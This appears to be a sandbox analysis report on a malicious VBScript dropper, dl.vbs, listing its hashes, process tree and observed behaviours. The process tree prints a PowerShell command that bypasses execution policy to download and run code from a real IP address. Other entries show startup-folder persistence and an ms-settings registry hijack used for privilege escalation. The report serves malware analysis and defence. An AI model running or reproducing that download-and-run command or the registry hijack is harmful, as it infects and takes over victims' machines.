Analysis
-
max time kernel
18s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
16/07/2024, 10:12
Static task
static1
Behavioral task
behavioral1
Sample
dl.vbs
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
dl.vbs
Resource
win10v2004-20240709-en
Errors
General
-
Target
dl.vbs
-
Size
587B
-
MD5
a9552114991c6ae378830ed3955d4414
-
SHA1
8655717e2a3ced90d352a7faf2586a73cefea7d8
-
SHA256
5399da749fe07467570bd0d81e3733b140df33dd75670a57362a6f4aa0dcafca
-
SHA512
a50b12dc7c531ec699a437fd8ab669aa70a477da49dd89ff16ef75ef68260963c82647a57c9b0a465ba106f9fa8302d534185ecf7b303f6f50493edc20736e6f
Malware Config
Extracted
http://94.131.117.72/ldvb/pw
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 2792 powershell.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_uyharj4_AA.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_uyharj4_y.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_uyharj4_.lnk powershell.exe -
pid Process 2792 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings\Shell\Open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings\Shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings\Shell\Open powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings\Shell\Open\command\DelegateExecute powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000_CLASSES\ms-settings\Shell\Open\command\ = "C:\\_uyharj4_\\_uyharj4_i7.exe" powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2792 powershell.exe Token: SeShutdownPrivilege 1100 shutdown.exe Token: SeRemoteShutdownPrivilege 1100 shutdown.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2176 wrote to memory of 2688 2176 WScript.exe 31 PID 2176 wrote to memory of 2688 2176 WScript.exe 31 PID 2176 wrote to memory of 2688 2176 WScript.exe 31 PID 2688 wrote to memory of 2792 2688 cmd.exe 33 PID 2688 wrote to memory of 2792 2688 cmd.exe 33 PID 2688 wrote to memory of 2792 2688 cmd.exe 33 PID 2792 wrote to memory of 1100 2792 powershell.exe 35 PID 2792 wrote to memory of 1100 2792 powershell.exe 35 PID 2792 wrote to memory of 1100 2792 powershell.exe 35
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dl.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Public\Documents\vs1.cmd" "2⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -Command "iex (new-object net.webclient).DownloadString('http://94.131.117.72/ldvb/pw')"3⤵
- Blocklisted process makes network request
- Drops startup file
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\shutdown.exe"C:\Windows\system32\shutdown.exe" /r /t 154⤵
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:792
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:1796
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
140B
MD51fd5100daa7e61dcf5e78751c0c21c1d
SHA150c35a4a38e02af8d57040cd149904927bc0a011
SHA256c8354622efb7cb6c6c2502242d8596131e379586f087d68cad088d6aafcc0ede
SHA512ffeb501f0e4253481dfe56968d708cc7a670088a62a7e0b2b05e5a50d3ad85dad47c1420e3582e29dfd3d0286c3755f0512dd8d28bf59920f1dd4e18e9075925